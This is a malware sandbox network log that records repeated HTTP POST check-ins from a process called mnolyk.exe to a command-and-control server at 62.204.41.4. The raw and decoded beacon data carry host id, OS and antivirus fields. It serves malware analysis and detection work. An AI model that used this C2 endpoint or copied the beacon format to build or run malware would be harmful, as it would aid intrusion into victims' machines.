309	192.168.2.5	50019	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:32.292788982 CET	528	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:32.357552052 CET	529	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.5	49731	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:13.477085114 CET	159	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:13.540271044 CET	159	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
310	192.168.2.5	50020	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:32.557219028 CET	529	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:32.622184992 CET	530	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
311	192.168.2.5	50021	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:32.794729948 CET	530	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:32.859031916 CET	531	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
312	192.168.2.5	50022	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:33.047755003 CET	531	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:33.112380028 CET	532	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
313	192.168.2.5	50023	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:33.280642033 CET	532	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:33.345523119 CET	533	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
314	192.168.2.5	50024	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:33.541536093 CET	533	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:33.603916883 CET	534	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
315	192.168.2.5	50025	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:33.797118902 CET	534	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:33.861409903 CET	535	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
316	192.168.2.5	50026	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:34.056162119 CET	535	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:34.120628119 CET	536	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
317	192.168.2.5	50027	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:34.302752972 CET	536	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:34.365164995 CET	537	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
318	192.168.2.5	50028	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:34.553699017 CET	537	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:34.617747068 CET	538	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
319	192.168.2.5	50029	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:34.809952974 CET	538	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:34.874922037 CET	539	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.5	49732	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:13.710639000 CET	160	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:13.774626017 CET	160	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
320	192.168.2.5	50030	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:35.059293985 CET	539	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:35.126708984 CET	540	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
321	192.168.2.5	50031	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:35.304361105 CET	540	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:35.369082928 CET	541	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
322	192.168.2.5	50032	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:35.551487923 CET	541	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:35.615287066 CET	542	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
323	192.168.2.5	50033	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:35.799544096 CET	543	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:35.863296986 CET	543	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
324	192.168.2.5	50035	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:36.040024996 CET	550	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:36.104940891 CET	550	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
325	192.168.2.5	50036	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:36.277045965 CET	551	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:36.341039896 CET	551	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
326	192.168.2.5	50037	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:36.516957045 CET	552	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:36.582451105 CET	552	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
327	192.168.2.5	50038	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:36.760812998 CET	553	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:36.823707104 CET	553	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
328	192.168.2.5	50039	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:36.996098995 CET	554	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
